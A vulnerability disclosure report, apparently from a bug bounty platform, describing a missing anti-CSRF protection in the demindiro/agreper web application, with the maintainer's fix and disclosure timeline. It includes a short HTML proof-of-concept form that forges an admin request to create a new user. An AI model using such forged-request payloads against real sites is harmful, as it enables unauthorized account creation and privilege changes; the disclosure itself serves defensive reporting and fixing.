Anti-CSRF mechanism is not present in demindiro/agreper


Reported on

Jan 24th 2023


The application is vulnerable to a CSRF attack.

Proof of Concept

  1. Login as admin.
  2. Open the following HTML file in the browser. This action is equivalent to clicking a link sent by an attacker.


  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/admin/user/new/" method="POST">
      <input type="hidden" name="name" value="csrf" />
      <input type="hidden" name="password" value="password" />
      <input type="submit" value="Submit request" />
  1. Click the button.
  2. A new user is created.


This vulnerability is capable of allowing an attacker to force a victim to perform admin actions such as:

  • Creating a new user
  • Changing user's role


We are processing your report and will contact the demindiro/agreper team within 24 hours. 10 months ago
A GitHub Issue asking the maintainers to create a exists 10 months ago
We have contacted a member of the demindiro/agreper team and are waiting to hear back 10 months ago
David Hoppenbrouwers validated this vulnerability 10 months ago

Apparently Flask doesn't set SameSite by default. Adding app.config['SESSION_COOKIE_SAMESITE'] = 'Lax' resolves this issue.


bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Hoppenbrouwers marked this as fixed in 0.1.1b with commit 09f56b 10 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
David Hoppenbrouwers published this vulnerability 10 months ago
to join this conversation